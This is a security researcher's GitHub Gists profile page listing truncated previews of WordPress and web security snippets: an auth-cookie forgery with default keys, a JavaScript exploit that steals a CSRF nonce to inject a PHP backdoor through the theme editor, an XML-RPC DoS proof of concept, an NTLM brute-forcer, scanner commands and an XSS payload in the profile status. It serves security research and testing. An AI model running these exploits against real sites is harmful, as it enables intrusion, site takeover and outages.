Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
"><img src=x onerror=alert('Github @ethicalhack3r')><"

Ryan Dewhurst ethicalhack3r

💭
"><img src=x onerror=alert('Github @ethicalhack3r')><"
View GitHub Profile
@ethicalhack3r
ethicalhack3r / pluggable.php
Created Nov 18, 2014
WordPress authentication cookie generation using default keys
View pluggable.php
<?php
if ( !function_exists('wp_generate_auth_cookie') ) :
/**
* Generate authentication cookie contents.
*
* @since 2.5.0
*
* @param int $user_id User ID
* @param int $expiration Cookie expiration in seconds
@ethicalhack3r
ethicalhack3r / backdoor.js
Last active Feb 3, 2021
wp backdoor exploit (injects a PHP backdoor)
View backdoor.js
var wpnonce = '';
function getCSRFNonce(callback)
{
var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true);
xhr.withCredentials = true;
xhr.overrideMimeType('text/xml');
@ethicalhack3r
ethicalhack3r / info.text
Last active Nov 13, 2020
Simple WPScan commands
View info.text
Get your API token from wpvulndb.com if you also want the vulnerabilities associated with the detected plugin displaying.
For all plugins with known vulnerabilities:
wpscan --url example.com -e vp --plugins-detection mixed --api-token YOUR_TOKEN
For all plugins in our database (could take a very long time):
wpscan --url example.com -e ap --plugins-detection mixed --api-token YOUR_TOKEN
@ethicalhack3r
ethicalhack3r / wp_dos.py
Created Aug 7, 2014
WP XML-RPC DoS Exploit
View wp_dos.py
#################################################################################
# CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS#
# Author: Nir Goldshlager - Salesforce.com Product Security Team#
# This is a Proof of Concept Exploit, Please use responsibly.#
#################################################################################
#!/usr/bin/env python
from __future__ import print_function
import threading
import time
import urllib
@ethicalhack3r
ethicalhack3r / magento_version.rb
Created Dec 12, 2016
Finds the remote version of magento
View magento_version.rb
#!/usr/bin/env ruby
require 'typhoeus'
require 'json'
require 'uri'
require 'digest/md5'
# https://raw.githubusercontent.com/gwillem/magento-version-identification/master/version_hashes.json
target = ARGV[0]
@ethicalhack3r
ethicalhack3r / wp_php_object_injection.rb
Last active Oct 28, 2019
Burp Suite Extension to detect PHP Object Injection in WordPress Plugins (read the code comments for additional info)
View wp_php_object_injection.rb
java_import 'burp.IBurpExtender'
java_import 'burp.IScannerCheck'
java_import 'burp.IScanIssue'
require 'java'
java_import 'java.util.Arrays'
java_import 'java.util.ArrayList'
#
# You will need to download JRuby's Complete.jar file from http://jruby.org/download and configure Burp Extender with its path.
View ids.txt
> select id from vulnerabilities where poc != '';
+------+
| id |
+------+
| 6028 |
| 6219 |
| 6499 |
| 6548 |
| 7680 |
| 7710 |
View is_wordpress.rb
#!/usr/bin/env ruby
require 'wpscan'
require 'uri'
filename = ARGV[0]
def check_wordpress( website )
WPScan::Browser.instance( disable_tls_checks: true )
View mad5.txt
Yes, this is a joke. But we will really be releasing a WordPress plugin. Let us know if you find any vulnerabilities ;)
9f10c5276812e8fdabc2c4e5bb75f836
@ethicalhack3r
ethicalhack3r / http_ntlm__auth_brute.rb
Created Aug 17, 2018
Brute Forces HTTP NTLM Basic Authentication using Typhoeus
View http_ntlm__auth_brute.rb
#!/usr/bin/env ruby
require 'typhoeus'
target_url = ARGV[0]
usernames = File.read(ARGV[1]).split("\n")
passwords = File.read(ARGV[2]).split("\n")
hydra = Typhoeus::Hydra.new